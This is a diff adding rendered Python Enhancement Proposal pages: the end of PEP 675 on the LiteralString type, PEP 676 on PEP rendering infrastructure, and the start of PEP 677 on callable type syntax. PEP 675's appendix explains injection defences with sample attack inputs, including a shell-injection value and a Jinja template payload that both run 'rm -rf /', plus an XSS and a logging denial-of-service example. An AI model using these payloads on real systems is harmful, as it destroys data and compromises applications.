It can be tempting to assume porting the concept of Trusted Types to +Python could solve the problem. The fundamental difference, however, +is that the output of a Trusted Types sanitizer is usually intended +to not be executable code. Thus it’s easy to HTML encode the input, +strip out dangerous tags, or otherwise render it inert. With a SQL +query or shell command, the end result still needs to be executable +code. There is no way to write a sanitizer that can reliably figure +out which parts of an input string are benign and which ones are +potentially malicious.

+
+
+

Runtime Checkable LiteralString

+

The LiteralString concept could be extended beyond static type +checking to be a runtime checkable property of str objects. This +would provide some benefits, such as allowing frameworks to raise +errors on dynamic strings. Such runtime errors would be a more robust +defense mechanism than type errors, which can potentially be +suppressed, ignored, or never even seen if the author does not use a +type checker.

+

This extension to the LiteralString concept would dramatically +increase the scope of the proposal by requiring changes to one of the +most fundamental types in Python. While runtime taint checking on +strings, similar to Perl’s taint, +has been considered and +attempted in the past, and +others may consider it in the future, such extensions are out of scope +for this PEP.

+
+
+

Rejected Names

+

We considered a variety of names for the literal string type and +solicited ideas on typing-sig. +Some notable alternatives were:

+
    +
  • Literal[str]: This is a natural extension of the +Literal["foo"] type name, but typing-sig objected +that users could mistake this for the literal type of the str +class.
  • +
  • LiteralStr: This is shorter than LiteralString but looks +weird to the PEP authors.
  • +
  • LiteralDerivedString: This (along with +MadeFromLiteralString) best captures the technical meaning of +the type. It represents not just the type of literal expressions, +such as "foo", but also that of expressions composed from +literals, such as "foo" + "bar". However, both names seem wordy.
  • +
  • StringLiteral: Users might confuse this with the existing +concept of “string literals” +where the string exists as a syntactic token in the source code, +whereas our concept is more general.
  • +
  • SafeString: While this comes close to our intended meaning, it +may mislead users into thinking that the string has been sanitized in +some way, perhaps by escaping HTML tags or shell-related special +characters.
  • +
  • ConstantStr: This does not capture the idea of composing literal +strings.
  • +
  • StaticStr: This suggests that the string is statically +computable, i.e., computable without running the program, which is +not true. The literal string may vary based on runtime flags, as +seen in the Motivation examples.
  • +
  • LiteralOnly[str]: This has the advantage of being extensible to +other literal types, such as bytes or int. However, we did +not find the extensibility worth the loss of readability.
  • +
+

Overall, there was no clear winner on typing-sig over a long period, +so we decided to tip the scales in favor of LiteralString.

+
+
+

LiteralBytes

+

We could generalize literal byte types, such as Literal[b"foo"], +to LiteralBytes. However, literal byte types are used much less +frequently than literal string types and we did not find much user +demand for LiteralBytes, so we decided not to include it in this +PEP. Others may, however, consider it in future PEPs.

+
+
+
+

Reference Implementation

+

This is implemented in Pyre v0.9.8 and is actively being used.

+

The implementation simply extends the type checker with +LiteralString as a supertype of literal string types.

+

To support composition via addition, join, etc., it was sufficient to +overload the stubs for str in Pyre’s copy of typeshed.

+
+
+

Appendix A: Other Uses

+

To simplify the discussion and require minimal security knowledge, we +focused on SQL injections throughout the PEP. LiteralString, +however, can also be used to prevent many other kinds of injection +vulnerabilities.

+
+

Command Injection

+

APIs such as subprocess.run accept a string which can be run as a +shell command:

+
subprocess.run(f"echo 'Hello {name}'", shell=True)
+
+
+

If user-controlled data is included in the command string, the code is +vulnerable to “command injection”; i.e., an attacker can run malicious +commands. For example, a value of ' && rm -rf / # would result in +the following destructive command being run:

+
echo 'Hello ' && rm -rf / #'
+
+
+

This vulnerability could be prevented by updating run to only +accept LiteralString when used in shell=True mode. Here is one +simplified stub:

+
def run(command: LiteralString, *args: str, shell: bool=...): ...
+
+
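
Under such a stub, a type checker would accept literal commands and reject interpolated ones (an illustrative sketch of the effect, not the actual subprocess stubs):

+
import subprocess
+
+name: str = input()
+
+subprocess.run("echo hello", shell=True)            # OK: literal string
+subprocess.run(f"echo 'Hello {name}'", shell=True)  # type error under the stricter stub
+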
+
+
+

Cross Site Scripting (XSS)

+

Most popular Python web frameworks, such as Django, use a templating +engine to produce HTML from user data. These templating languages +auto-escape user data before inserting it into the HTML template and +thus prevent cross site scripting (XSS) vulnerabilities.

+

But a common way to bypass auto-escaping +and render HTML as-is is to use functions like mark_safe in +Django +or do_mark_safe in Jinja2, +which cause XSS vulnerabilities:

+
 dangerous_string = django.utils.safestring.mark_safe(f"<script>{user_input}</script>")
+ return dangerous_string
+
+
+

This vulnerability could be prevented by updating mark_safe to +only accept LiteralString:

+
 def mark_safe(s: LiteralString) -> str: ...
+
+
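
Under such a stub, literal markup is still accepted while anything interpolated from user data is rejected (an illustrative sketch, assuming Django is installed):

+
from django.utils.safestring import mark_safe
+
+user_input: str = input()
+
+mark_safe("<b>bold</b>")                     # OK: literal string
+mark_safe(f"<script>{user_input}</script>")  # type error under the stricter stub
+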
+
+
+

Server Side Template Injection (SSTI)

+

Templating frameworks, such as Jinja, allow Python expressions which +will be evaluated and substituted into the rendered result:

+
template_str = "There are {{ len(values) }} values: {{ values }}"
+template = jinja2.Template(template_str)
+template.render(values=[1, 2])
+# Result: "There are 2 values: [1, 2]"
+
+
+

If an attacker controls all or part of the template string, they can +insert expressions which execute arbitrary code and compromise +the application:

+
 malicious_str = "{{''.__class__.__base__.__subclasses__()[408]('rm -rf /', shell=True)}}"
+ template = jinja2.Template(malicious_str)
+ template.render()
+ # Result: The shell command 'rm -rf /' is run
+
+
+

Template injection exploits like this could be prevented by updating +the Template API to only accept LiteralString:

+
 class Template:
+     def __init__(self, source: LiteralString): ...
+
+
+
+
+

Logging Format String Injection

+

Logging frameworks often allow their input strings to contain +formatting directives. At its worst, allowing users to control the +logged string has led to CVE-2021-44228 (colloquially +known as log4shell), which has been described as the “most +critical vulnerability of the last decade”. +While no Python frameworks are currently known to be vulnerable to a +similar attack, the built-in logging framework does provide formatting +options which are vulnerable to Denial of Service attacks from +externally controlled logging strings. The following example +illustrates a simple denial of service scenario:

+
 external_string = "%(foo)999999999s"
+ ...
+ # Tries to add > 1GB of whitespace to the logged string:
+ logger.info(f'Received: {external_string}', some_dict)
+
+
+

This kind of attack could be prevented by requiring that the format +string passed to the logger be a LiteralString and that all +externally controlled data be passed separately as arguments (as +proposed in Issue 46200):

+
 def info(msg: LiteralString, *args: object) -> None:
+     ...
+
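
With that signature, externally controlled data must be passed as an argument and can never reach the format string itself (a minimal sketch; external_string stands in for untrusted input):

+
import logging
+
+logger = logging.getLogger(__name__)
+external_string = input()
+
+logger.info("Received: %s", external_string)  # OK: literal format string
+logger.info(external_string)                  # type error: non-literal format string
+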
+
+
+
+
+

Appendix B: Limitations

+

There are a number of ways LiteralString could still fail to +prevent users from passing strings built from non-literal data to an +API:

+

1. If the developer does not use a type checker or does not add type +annotations, then violations will go uncaught.

+

2. cast(LiteralString, non_literal_string) could be used to lie to +the type checker and allow a dynamic string value to masquerade as a +LiteralString. The same goes for a variable that has type Any.

+
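
For example (a minimal sketch; execute stands in for any sensitive API that accepts LiteralString):

+
from typing import Any, LiteralString, cast
+
+def execute(sql: LiteralString) -> None: ...  # hypothetical sensitive API
+
+user_input: str = input()
+
+query = cast(LiteralString, user_input)  # the type checker now trusts the value
+execute(query)                           # no error reported, but unsafe
+
+anything: Any = user_input
+execute(anything)                        # Any is also compatible with LiteralString
+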

3. Comments such as # type: ignore could be used to ignore +warnings about non-literal strings.

+

4. Trivial functions could be constructed to convert a str to a +LiteralString:

+
 def make_literal(s: str) -> LiteralString:
+     letters: Dict[str, LiteralString] = {
+         "A": "A",
+         "B": "B",
+         ...
+     }
+     output: List[LiteralString] = [letters[c] for c in s]
+     return "".join(output)
+
+
+

We could mitigate the above using linting, code review, etc., but +ultimately a clever, malicious developer attempting to circumvent the +protections offered by LiteralString will always succeed. The +important thing to remember is that LiteralString is not intended +to protect against malicious developers; it is meant to protect +against benign developers accidentally using sensitive APIs in a +dangerous way (without getting in their way otherwise).

+

Without LiteralString, the best enforcement tool API authors have +is documentation, which is easily ignored and often not seen. With +LiteralString, API misuse requires conscious thought and artifacts +in the code that reviewers and future developers can notice.

+
+
+

Appendix C: str methods that preserve LiteralString

+

The str class has several methods that would benefit from +LiteralString. For example, users might expect +"hello".capitalize() to have the type LiteralString similar to +the other examples we have seen in the Inferring LiteralString section. Inferring the type +LiteralString is correct because the string is not an arbitrary +user-supplied string - we know that it has the type +Literal["Hello"], which is compatible with LiteralString. In +other words, the capitalize method preserves the LiteralString +type. There are several other str methods that preserve +LiteralString.

+
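
For example, with the overloaded stub shown later in this appendix in place (expect_literal_string is the hypothetical helper from the earlier examples):

+
from typing import LiteralString
+
+def expect_literal_string(s: LiteralString) -> None: ...
+
+greeting = "hello".capitalize()  # inferred as Literal["Hello"], compatible with LiteralString
+expect_literal_string(greeting)  # OK
+
+user_string: str = input()
+user_string.capitalize()         # plain str: nothing literal to preserve
+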

We propose updating the stub for str in typeshed so that the +methods are overloaded with the LiteralString-preserving +versions. This means type checkers do not have to hardcode +LiteralString behavior for each method. It also lets us easily +support new methods in the future by updating the typeshed stub.

+

For example, to preserve literal types for the capitalize method, +we would change the stub as below:

+
# before
+def capitalize(self) -> str: ...
+
+# after
+@overload
+def capitalize(self: LiteralString) -> LiteralString: ...
+@overload
+def capitalize(self) -> str: ...
+
+
+

The downside of changing the str stub is that the stub becomes +more complicated and can make error messages harder to +understand. Type checkers may need to special-case str to make +error messages understandable for users.

+

Below is an exhaustive list of str methods which, when called with +arguments of type LiteralString, must be treated as returning a +LiteralString. If this PEP is accepted, we will update these +method signatures in typeshed:

+
@overload
+def capitalize(self: LiteralString) -> LiteralString: ...
+@overload
+def capitalize(self) -> str: ...
+
+@overload
+def casefold(self: LiteralString) -> LiteralString: ...
+@overload
+def casefold(self) -> str: ...
+
+@overload
+def center(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def center(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+if sys.version_info >= (3, 8):
+    @overload
+    def expandtabs(self: LiteralString, tabsize: SupportsIndex = ...) -> LiteralString: ...
+    @overload
+    def expandtabs(self, tabsize: SupportsIndex = ...) -> str: ...
+
+else:
+    @overload
+    def expandtabs(self: LiteralString, tabsize: int = ...) -> LiteralString: ...
+    @overload
+    def expandtabs(self, tabsize: int = ...) -> str: ...
+
+@overload
+def format(self: LiteralString, *args: LiteralString, **kwargs: LiteralString) -> LiteralString: ...
+@overload
+def format(self, *args: str, **kwargs: str) -> str: ...
+
+@overload
+def join(self: LiteralString, __iterable: Iterable[LiteralString]) -> LiteralString: ...
+@overload
+def join(self, __iterable: Iterable[str]) -> str: ...
+
+@overload
+def ljust(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def ljust(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+@overload
+def lower(self: LiteralString) -> LiteralString: ...
+@overload
+def lower(self) -> str: ...
+
+@overload
+def lstrip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def lstrip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def partition(self: LiteralString, __sep: LiteralString) -> tuple[LiteralString, LiteralString, LiteralString]: ...
+@overload
+def partition(self, __sep: str) -> tuple[str, str, str]: ...
+
+@overload
+def replace(self: LiteralString, __old: LiteralString, __new: LiteralString, __count: SupportsIndex = ...) -> LiteralString: ...
+@overload
+def replace(self, __old: str, __new: str, __count: SupportsIndex = ...) -> str: ...
+
+if sys.version_info >= (3, 9):
+    @overload
+    def removeprefix(self: LiteralString, __prefix: LiteralString) -> LiteralString: ...
+    @overload
+    def removeprefix(self, __prefix: str) -> str: ...
+
+    @overload
+    def removesuffix(self: LiteralString, __suffix: LiteralString) -> LiteralString: ...
+    @overload
+    def removesuffix(self, __suffix: str) -> str: ...
+
+@overload
+def rjust(self: LiteralString, __width: SupportsIndex, __fillchar: LiteralString = ...) -> LiteralString: ...
+@overload
+def rjust(self, __width: SupportsIndex, __fillchar: str = ...) -> str: ...
+
+@overload
+def rpartition(self: LiteralString, __sep: LiteralString) -> tuple[LiteralString, LiteralString, LiteralString]: ...
+@overload
+def rpartition(self, __sep: str) -> tuple[str, str, str]: ...
+
+@overload
+def rsplit(self: LiteralString, sep: LiteralString | None = ..., maxsplit: SupportsIndex = ...) -> list[LiteralString]: ...
+@overload
+def rsplit(self, sep: str | None = ..., maxsplit: SupportsIndex = ...) -> list[str]: ...
+
+@overload
+def rstrip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def rstrip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def split(self: LiteralString, sep: LiteralString | None = ..., maxsplit: SupportsIndex = ...) -> list[LiteralString]: ...
+@overload
+def split(self, sep: str | None = ..., maxsplit: SupportsIndex = ...) -> list[str]: ...
+
+@overload
+def splitlines(self: LiteralString, keepends: bool = ...) -> list[LiteralString]: ...
+@overload
+def splitlines(self, keepends: bool = ...) -> list[str]: ...
+
+@overload
+def strip(self: LiteralString, __chars: LiteralString | None = ...) -> LiteralString: ...
+@overload
+def strip(self, __chars: str | None = ...) -> str: ...
+
+@overload
+def swapcase(self: LiteralString) -> LiteralString: ...
+@overload
+def swapcase(self) -> str: ...
+
+@overload
+def title(self: LiteralString) -> LiteralString: ...
+@overload
+def title(self) -> str: ...
+
+@overload
+def upper(self: LiteralString) -> LiteralString: ...
+@overload
+def upper(self) -> str: ...
+
+@overload
+def zfill(self: LiteralString, __width: SupportsIndex) -> LiteralString: ...
+@overload
+def zfill(self, __width: SupportsIndex) -> str: ...
+
+@overload
+def __add__(self: LiteralString, __s: LiteralString) -> LiteralString: ...
+@overload
+def __add__(self, __s: str) -> str: ...
+
+@overload
+def __iter__(self: LiteralString) -> Iterator[LiteralString]: ...
+@overload
+def __iter__(self) -> Iterator[str]: ...
+
+@overload
+def __mod__(self: LiteralString, __x: Union[LiteralString, Tuple[LiteralString, ...]]) -> LiteralString: ...
+@overload
+def __mod__(self, __x: Union[str, Tuple[str, ...]]) -> str: ...
+
+@overload
+def __mul__(self: LiteralString, __n: SupportsIndex) -> LiteralString: ...
+@overload
+def __mul__(self, __n: SupportsIndex) -> str: ...
+
+@overload
+def __repr__(self: LiteralString) -> LiteralString: ...
+@overload
+def __repr__(self) -> str: ...
+
+@overload
+def __rmul__(self: LiteralString, n: SupportsIndex) -> LiteralString: ...
+@overload
+def __rmul__(self, n: SupportsIndex) -> str: ...
+
+@overload
+def __str__(self: LiteralString) -> LiteralString: ...
+@overload
+def __str__(self) -> str: ...
+
+
+
+
+

Appendix D: Guidelines for using LiteralString in Stubs

+

Libraries that do not contain type annotations within their source may +specify type stubs in Typeshed. Libraries written in other languages, +such as those for machine learning, may also provide Python type +stubs. This means the type checker cannot verify that the type +annotations match the source code and must trust the type stub. Thus, +authors of type stubs need to be careful when using LiteralString, +since a function may falsely appear to be safe when it is not.

+

We recommend the following guidelines for using LiteralString in stubs:

+
    +
  • If the stub is for a pure function, we recommend using LiteralString +in the return type of the function or of its overloads only if all +the corresponding parameters have literal types (i.e., +LiteralString or Literal["a", "b"]).
    # OK
    +@overload
    +def my_transform(x: LiteralString, y: Literal["a", "b"]) -> LiteralString: ...
    +@overload
    +def my_transform(x: str, y: str) -> str: ...
    +
    +# Not OK
    +@overload
    +def my_transform(x: LiteralString, y: str) -> LiteralString: ...
    +@overload
    +def my_transform(x: str, y: str) -> str: ...
    +
    +
    +
  • +
  • If the stub is for a staticmethod, we recommend the same +guideline as above.
  • +
  • If the stub is for any other kind of method, we recommend against +using LiteralString in the return type of the method or any of +its overloads. This is because, even if all the explicit parameters +have type LiteralString, the object itself may be created using +user data and thus the return type may be user-controlled.
  • +
  • If the stub is for a class attribute or global variable, we also +recommend against using LiteralString because the untyped code +may write arbitrary values to the attribute.
  • +
+

However, we leave the final call to the library author. They may use +LiteralString if they feel confident that the string returned by +the method or function or the string stored in the attribute is +guaranteed to have a literal type - i.e., the string is created by +applying only literal-preserving str operations to a string +literal.

+

Note that these guidelines do not apply to inline type annotations +since the type checker can verify that, say, a method returning +LiteralString does in fact return an expression of that type.

+
+
+

Resources

+
+

Literal String Types in Scala

+

Scala uses +Singleton as the supertype for singleton types, which includes +literal string types, such as "foo". Singleton is Scala’s +generalized analogue of this PEP’s LiteralString.

+

Tamer Abdulradi showed how Scala’s literal string types can be used +for “Preventing SQL injection at compile time”, Scala Days talk +Literal types: What are they good for? +(slides 52 to 68).

+
+
+

Thanks

+

Thanks to the following people for their feedback on the PEP:

+

Edward Qiu, Jia Chen, Shannon Zhu, Gregory P. Smith, Никита Соболев, +CAM Gerlach, Arie Bovenberg, David Foster, and Shengye Wan

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0675.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0676/index.html b/pep-0676/index.html new file mode 100644 index 00000000000..b0c7cce9d38 --- /dev/null +++ b/pep-0676/index.html @@ -0,0 +1,376 @@ + PEP 676 – PEP Infrastructure Process | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 676 – PEP Infrastructure Process

+
+
Author:
+
Adam Turner <python at quite.org.uk>
+
Sponsor:
+
Mariatta <mariatta at python.org>
+
PEP-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
01-Nov-2021
+
Post-History:
+
23-Sep-2021, 30-Nov-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP addresses the infrastructure around rendering PEP files from +reStructuredText files to HTML webpages. We aim to specify a self-contained +and maintainable solution for PEP readers, authors, and editors.

+
+
+

Motivation

+

As of November 2021, Python Enhancement Proposals (PEPs) are rendered in a +multi-system, multi-stage process. A continuous integration (CI) task runs a +docutils script to render all PEP files individually. The CI task then +uploads a tar archive to a server, where it is retrieved and rendered into the +python.org website periodically.

+

This places a constraint on the python.org website to handle raw HTML +uploads and handle PEP rendering, and makes the appropriate place to raise +issues unclear in some cases [1].

+

This PEP provides a specification for self-contained rendering of PEPs. This +would:

+
    +
  • reduce the amount of distributed configuration for supporting PEPs
  • +
  • enable quality-of-life improvements for those who read, write, and review +PEPs
  • +
  • solve a number of outstanding issues, and lay the path for improvements
  • +
  • save volunteer maintainers’ time
  • +
+

We propose that PEPs are accessed through peps.python.org at the top-level +(for example peps.python.org/pep-0008), and that all custom tooling to +support rendering PEPs is hosted in the python/peps repository.

+
+
+

Rationale

+
+

Simplifying and Centralising Infrastructure

+

As of November 2021, to locally render a PEP file, a PEP author or editor needs +to create a full local instance of the python.org website and run a number +of disparate scripts, following documentation that lives outside of the +python/peps repository.

+

By contrast, the proposed implementation provides a single Makefile and a +Python script to render all PEP files, with options to target a web-server or +the local filesystem.

+

Using a single repository to host all tooling will clarify where to raise +issues, reducing volunteer time spent in triage.

+

Simplified and centralised tooling may also reduce the barrier to entry to +further improvements, as the scope of the PEP rendering infrastructure is well +defined.

+
+
+

Quality-of-Life Improvements and Resolving Issues

+

There are several requests for additional features in reading PEPs, such as:

+
    +
  • syntax highlighting [2]
  • +
  • use of .. code-block:: directives [2]
  • +
  • support for SVG images [3]
  • +
  • typographic quotation marks [4]
  • +
  • additional footer information [5]
  • +
  • intersphinx functionality [6]
  • +
  • dark mode theme [7]
  • +
+

These are “easy wins” from this proposal, and would serve to improve the +quality-of-life for consumers of PEPs (including reviewers and writers).

+

For example, the current (as of November 2021) system runs periodically on a +schedule. This means that updates to PEPs cannot be circulated immediately, +reducing productivity. The reference implementation renders and publishes all +PEPs on every commit to the repository, solving the issue by design.

+

The reference implementation fixes several issues [8]. For example:

+
    +
  • list styles are currently not respected by python.org’s stylesheets
  • +
  • support for updating images in PEPs is challenging in python.org
  • +
+

Third-party providers such as Read the Docs or Netlify can enhance this +experience with features such as automatic rendering of pull requests.

+
+
+
+

Specification

+

The proposed specification for rendering the PEP files to HTML is as per the +reference implementation.

+

The rendered PEPs MUST be available at peps.python.org. These SHOULD be +hosted as static files, and MAY be behind a content delivery network (CDN).

+

A service to render previews of pull requests SHOULD be provided. This service +MAY be integrated with the hosting and deployment solution.

+

The following redirect rules MUST be created for the python.org domain:

+
    +
  • /dev/peps/<path> MUST redirect to peps.python.org/<path>/
  • +
  • /peps/<name>.html MUST redirect to peps.python.org/<name>/
  • +
  • all other /peps and /dev/peps URLs MUST redirect to peps.python.org
  • +
+

The following nginx configuration would achieve this:

+
location ~ ^/dev/peps/?(.*)$ {
+    return 308 https://peps.python.org/$1/;
+}
+
+location ~ ^/peps/(.*)\.html$ {
+    return 308 https://peps.python.org/$1/;
+}
+
+location ~ ^/(dev/)?peps(/.*)?$ {
+    return 308 https://peps.python.org/;
+}
+
+
+

Redirects MUST be implemented to preserve URL fragments for backward +compatibility purposes.

+
+
+

Backwards Compatibility

+

Due to server-side redirects to the new canonical URLs, links in previously +published materials referring to the old URL schemes will be guaranteed to work. +All PEPs will continue to render correctly, and a custom stylesheet in the +reference implementation improves presentation for some elements (most notably +code blocks and block quotes). Therefore, this PEP presents no backwards +compatibility issues.

+
+
+

Security Implications

+

The main python.org website will no longer process raw HTML uploads, +closing a potential threat vector. PEP rendering and deployment processes will +use modern, well-maintained code and secure automated platforms, further +reducing the potential attack surface. Therefore, we see no negative security +impact.

+
+
+

How to Teach This

+

The new canonical URLs will be publicised in the documentation. However, this +is mainly a backend infrastructure change, and there should be minimal +end-user impact. PEP 1 and PEP 12 will be updated as needed.

+
+
+

Reference Implementation

+

The proposed implementation has been merged into the python/peps repository +in a series of pull requests [9]. It uses the Sphinx documentation system +with a custom theme (supporting light and dark colour schemes) and extensions.

+

This already automatically renders all PEPs on every commit, and publishes them +to python.github.io/peps. The high level documentation for the system covers +how to render PEPs locally and +the implementation of the system.

+
+
+

Rejected Ideas

+

It would likely be possible to amend the current (as of November 2021) +rendering process to include a subset of the quality-of-life improvements and +issue mitigations mentioned above. However, we do not believe that this would +solve the distributed tooling issue.

+

It would be possible to use the output from the proposed rendering system and +import it into python.org. We would argue that this would be the worst of +both worlds, as a great deal of complexity is added whilst none is removed.

+
+
+

Acknowledgements

+
    +
  • Hugo van Kemenade
  • +
  • Pablo Galindo Salgado
  • +
  • Éric Araujo
  • +
  • Mariatta
  • +
  • C.A.M. Gerlach
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0676.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0677/index.html b/pep-0677/index.html new file mode 100644 index 00000000000..67dabbafb86 --- /dev/null +++ b/pep-0677/index.html @@ -0,0 +1,1384 @@ + PEP 677 – Callable Type Syntax | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 677 – Callable Type Syntax

+
+
Author:
+
Steven Troxler <steven.troxler at gmail.com>, +Pradeep Kumar Srinivasan <gohanpra at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
13-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
16-Dec-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a concise and friendly syntax for callable types, +supporting the same functionality as typing.Callable but with an +arrow syntax inspired by the syntax for typed function +signatures. This allows types like Callable[[int, str], bool] to +be written as (int, str) -> bool.

+

The proposed syntax supports all the functionality provided by +typing.Callable and typing.Concatenate, and is intended to +work as a drop-in replacement.

+
+
+

Motivation

+

One way to make code safer and easier to analyze is by making sure +that functions and classes are well-typed. In Python we have type +annotations, the framework for which is defined in PEP 484, to provide +type hints that can find bugs as well as helping with editor tooling +like tab completion, static analysis tooling, and code review.

+

Consider the following untyped code:

+
def flat_map(func, l):
+    out = []
+    for element in l:
+        out.extend(func(element))
+    return out
+
+
+def wrap(x: int) -> list[int]:
+    return [x]
+
+def add(x: int, y: int) -> int:
+    return x + y
+
+flat_map(wrap, [1, 2, 3])  # no runtime error, output is [1, 2, 3]
+flat_map(add, [1, 2, 3])   # runtime error: `add` expects 2 arguments, got 1
+
+
+

We can add types to this example to detect the runtime error:

+
from typing import Callable
+
+def flat_map(
+    func: Callable[[int], list[int]],
+    l: list[int]
+) -> list[int]:
+    ...
+
+...
+
+
+flat_map(wrap, [1, 2, 3])  # type checks okay, output is [1, 2, 3]
+flat_map(add, [1, 2, 3])   # type check error
+
+
+

There are a few usability challenges with Callable we can see here:

+
    +
  • It is verbose, particularly for more complex function signatures.
  • +
  • It relies on two levels of nested brackets, unlike any other generic +type. This can be especially hard to read when some of the type +parameters are themselves generic types.
  • +
  • The bracket structure is not visually similar to how function signatures +are written.
  • +
  • It requires an explicit import, unlike many of the other most common +types like list and dict.
  • +
+

Possibly as a result, programmers often fail to write complete +Callable types. +Such untyped or partially-typed callable types do not check the +parameter types or return types of the given callable and thus negate +the benefits of static typing. For example, they might write this:

+
from typing import Callable
+
+def flat_map(
+    func: Callable[..., Any],
+    l: list[int]
+) -> list[int]:
+    ...
+
+...
+
+
+flat_map(add, [1, 2, 3])  # oops, no type check error!
+
+
+

There’s some partial type information here - we at least know that func +needs to be callable. But we’ve dropped too much type information for +type checkers to find the bug.

+

With our proposal, the example looks like this:

+
def flat_map(
+    func: (int) -> list[int],
+    l: list[int]
+) -> list[int]:
+    out = []
+    for element in l:
+        out.extend(func(element))
+    return out
+
+...
+
+
+

The type (int) -> list[int] is more concise, uses an arrow similar +to the one indicating a return type in a function header, avoids +nested brackets, and does not require an import.

+
+
+

Rationale

+

The Callable type is widely used. For example, as of October 2021 +it was +the fifth most common complex type in typeshed, after Optional, +Tuple, Union, and List.

+

The others have had their syntax improved and the need for imports +eliminated by either PEP 604 or PEP 585:

+
    +
  • typing.Optional[int] is written int | None
  • +
  • typing.Union[int, str] is written int | str
  • +
  • typing.List[int] is written list[int]
  • +
  • typing.Tuple[int, str] is written tuple[int, str]
  • +
+

The typing.Callable type is used almost as often as these other +types, is more complicated to read and write, and still requires an +import and bracket-based syntax.

+

In this proposal, we chose to support all the existing semantics of +typing.Callable, without adding support for new features. We made +this decision after examining how frequently each feature might be +used in existing typed and untyped open-source code. We determined +that the vast majority of use cases are covered.

+

We considered adding support for named, optional, and variadic +arguments. However, we decided against including these features, as +our analysis showed they are infrequently used. When they are really +needed, it is possible to type these using callback protocols.

+
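
For instance, a callback with a named, optional parameter - something typing.Callable cannot express - can be written as a callback protocol (a minimal sketch; the Combiner name is illustrative):

+
from typing import Protocol
+
+class Combiner(Protocol):
+    def __call__(self, x: int, y: str = ...) -> bool: ...
+
+def apply(f: Combiner) -> bool:
+    return f(1, y="hi")
+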
+

An Arrow Syntax for Callable Types

+

We are proposing a succinct, easy-to-use syntax for +typing.Callable that looks similar to function headers in Python. +Our proposal closely follows syntax used by several popular languages +such as TypeScript, +Kotlin, and Scala.

+

Our goals are that:

+
    +
  • Callable types using this syntax will be easier to learn and use, +particularly for developers with experience in other languages.
  • +
  • Library authors will be more likely to use expressive types for +callables that enable type checkers to better understand code and +find bugs, as in the decorator example above.
  • +
+

Consider this simplified real-world example from a web server, written +using the existing typing.Callable:

+
from typing import Awaitable, Callable
+from app_logic import Response, UserSetting
+
+
+def customize_response(
+    response: Response,
+    customizer: Callable[[Response, list[UserSetting]], Awaitable[Response]]
+) -> Response:
+   ...
+
+
+

With our proposal, this code can be abbreviated to:

+
from app_logic import Response, UserSetting
+
+def customize_response(
+    response: Response,
+    customizer: async (Response, list[UserSetting]) -> Response,
+) -> Response:
+    ...
+
+
+

This is shorter and requires fewer imports. It also has far less +nesting of square brackets - only one level, as opposed to three in +the original code.

+
+
+

Compact Syntax for ParamSpec

+

A particularly common case where library authors leave off type information +for callables is when defining decorators. Consider the following:

+
from typing import Any, Callable
+
+def with_retries(
+    f: Callable[..., Any]
+) -> Callable[..., Any]:
+    def wrapper(retry_once, *args, **kwargs):
+        if retry_once:
+            try: return f(*args, **kwargs)
+            except Exception: pass
+        return f(*args, **kwargs)
+    return wrapper
+
+@with_retries
+def f(x: int) -> int:
+    return x
+
+
+f(y=10)  # oops - no type error!
+
+
+

In the code above, it is clear that the decorator should produce a +function whose signature is like that of the argument f other +than an additional retry_once argument. But the use of ... +prevents a type checker from seeing this and alerting a user that +f(y=10) is invalid.

+

With PEP 612 it is possible to type decorators like this correctly +as follows:

+
from typing import Any, Callable, Concatenate, ParamSpec, TypeVar
+
+R = TypeVar("R")
+P = ParamSpec("P")
+
+def with_retries(
+    f: Callable[P, R]
+) -> Callable[Concatenate[bool, P], R]:
+    def wrapper(retry_once: bool, *args: P.args, **kwargs: P.kwargs) -> R:
+        ...
+    return wrapper
+
+...
+
+
+

With our proposed syntax, the properly-typed decorator example becomes +concise and the type representations are visually descriptive:

+
from typing import Any, ParamSpec, TypeVar
+
+R = TypeVar("R")
+P = ParamSpec("P")
+
+def with_retries(
+    f: (**P) -> R
+) -> (bool, **P) -> R:
+    ...
+
+
+
+
+

Comparing to Other Languages

+

Many popular programming languages use an arrow syntax similar +to the one we are proposing here.

+
+

TypeScript

+

In TypeScript, +function types are expressed in a syntax almost the same as the one we +are proposing, but the arrow token is => and arguments have names:

+
(x: int, y: str) => bool
+
+
+

The names of the arguments are not actually relevant to the type. So, +for example, this is the same callable type:

+
(a: int, b: str) => bool
+
+
+
+
+

Kotlin

+

Function types in Kotlin permit +an identical syntax to the one we are proposing, for example:

+
(Int, String) -> Bool
+
+
+

It also optionally allows adding names to the arguments, for example:

+
(x: Int, y: String) -> Bool
+
+
+

As in TypeScript, the argument names (if provided) are just there for +documentation and are not part of the type itself.

+
+
+

Scala

+

Scala +uses the => arrow for function types. Other than that, their syntax is +the same as the one we are proposing, for example:

+
(Int, String) => Bool
+
+
+

Scala, like Python, has the ability to provide function arguments by name. +Function types can optionally include names, for example:

+
(x: Int, y: String) => Bool
+
+
+

